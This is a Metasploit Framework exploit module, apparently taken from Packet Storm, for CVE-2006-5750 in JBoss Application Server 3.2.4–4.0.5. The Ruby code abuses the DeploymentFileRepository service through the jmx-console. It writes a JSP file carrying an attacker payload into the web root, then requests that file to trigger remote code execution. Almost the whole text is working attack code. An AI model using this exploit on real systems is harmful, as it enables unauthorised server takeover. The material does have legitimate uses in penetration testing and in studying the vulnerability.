This Metasploit module exploits a directory traversal vulnerability in the DeploymentFileRepository class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability allows remote authenticated (and unauthenticated) users to read or modify arbitrary files, and possibly execute arbitrary code.
8a9a09e9e3e11dbba365dfd0b4f80d5ef2cf90d92cc0ca65b1ee490fcc113646##
# $Id: jboss_deploymentfilerepository.rb 9246 2010-05-07 22:28:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the DeploymentFileRepository
class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability
allows remote authenticated (and unathenticated) users to read or modify arbitrary files,
and possibly execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9246 $',
'References' =>
[
[ 'CVE', '2006-5750' ],
[ 'BID', '21219' ]
],
'Privileged' => false,
'Platform' => [ 'linux' ],
'Targets' =>
[
[ 'Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true,
},
}
],
],
'DisclosureDate' => 'Nov 27 2006',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
OptString.new('URI', [ true, "The system shell to use.", '/jmx-console/']),
OptString.new('PATH', [ true, "The URI path of the console.", '../jmx-console.war/'])
], self.class)
end
def exploit
fname = rand_text_alpha_upper(rand(5) + 1)
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST',
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
})
if (res.code == 200)
print_status("Triggering payload...")
send_request_raw(
{
'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET',
})
else
print_error("Denied...")
end
handler
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed